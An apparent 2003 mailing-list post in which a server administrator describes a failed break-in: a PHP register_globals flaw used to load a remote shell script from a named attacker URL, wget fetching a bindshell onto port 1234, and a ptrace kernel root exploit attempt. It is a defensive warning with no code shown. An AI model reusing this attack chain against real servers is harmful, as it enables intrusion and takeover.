[IOML] Y'all be careful out there...

Dylan Smith dyls at dylansmith.co.im
Sun Apr 27 22:15:02 2003


All,

Today, at 07:32 UTC, someone tried to root (i.e. hack in and gain root
access) to one of my servers via a bug in a PHP script, a bindshell and an
attempt at exploiting the ptrace vulnerability in Linux kernels <= 2.4.19.

If you're running php code, and have register globals ON (as quite a few
scripts require), just a timely reminder that any local root exploit can
easily become a remote root exploit. This particular one caused a news PHP
script which didn't prevent a variable from being initialized by arguments
passed in the URL. It caused the script to run a PHP Unix shell executer
from the cracker's box (http://e-lite.reclone.nl/db_settings.php). The
cracker then used that to execute wget on my box to download an executable
called 'bindshell' in /tmp, and then execute it. Bindshell is a simple
program that listens on port 1234/tcp and attach /bin/sh to the resulting
socket. From the bindshell (running as user apache, which in itself can't
do much harm), the perpetrator downloaded ptrace-kmod.c, compile it with
gcc, and then try to run it. ptrace-kmod is a program that attacks the
ptrace kmod vulnerability in kernels <= 2.4.19 and gain root access.
Fortunately (although I need to run 2.4.19 for the time being) as soon as
I heard of the ptrace vuln, I ran a workaround which stops it from
working. The cracker tried ptrace twice and gave up. Looking at the apache
logs, they issued quite a few commands with the PHP shell, including I
assume a uname -a to see if I was running a vulnerable kernel.

In the mistaken belief my kernel was vulnerable, they tried to gain root
access. The upshot of this is that they ended up leaving lots of logs of
their activities, including the IP address of their machine, a Debian
system on a broadband connection in the Netherlands. Chello.nl abuse has
been informed...

I had a very narrow brush with having my server rooted this
morning...hopefully abuse@chello.nl will LART whoever is in charge of
e-lite.reclone.nl.

-- 
Dylan Smith, Castletown, Isle of Man      | Code fast, crash young and
Flying: http://www.dylansmith.net         | leave a beautiful core.
FFE/Elite Universe: http://www.alioth.net |             -- JK (#afe)